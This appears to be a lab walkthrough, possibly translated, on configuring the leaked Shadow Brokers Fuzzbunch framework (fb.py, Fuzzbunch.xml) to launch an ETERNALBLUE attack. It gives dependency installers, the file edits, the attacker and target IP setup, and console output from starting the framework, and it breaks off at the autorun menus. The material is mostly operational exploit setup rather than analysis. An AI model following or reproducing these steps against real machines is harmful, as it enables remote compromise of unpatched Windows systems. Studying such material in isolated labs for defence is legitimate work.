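0x01 Download the NSA toolkit
The attack scripts require a 32-bit Python 2.6 environment, so the attacking machine also needs the following two installers:
python-2.6.6.msi and pywin32-221.win32-py2.6.exe
0x02 Modify the NSA tool configuration files
- Modify the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py
Comment out line 72 so that it reads #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)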
def load_plugins(fb):
    fb.io.pre_input(None)
    fb.io.print_msg("Loading Plugins")
    fb.io.post_input()
    addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin)
    addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin)
    addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin)
    addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
    #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
    addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager)
- Modify the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml
Change the Resources path on line 19 and the logs path on line 24 to the path where the toolkit is currently stored
<t:parameter name="ResourcesDir"
             description="Absolute path of the Resources Directory"
             type="String"
             default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"
             description="Absolute path of an Initial Log Directory"
             type="String"
             default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>
0x03 Run the fb.py script to carry out the ETERNALBLUE attack
- Environment:
Test machine Windows 7/2008 10.130.3.246
Attacking machine Windows 10 10.130.3.243
Attacking machine Kali 10.130.3.242
- Run fb.py to carry out the Eternalblue attack
Run the file C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py
Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
=========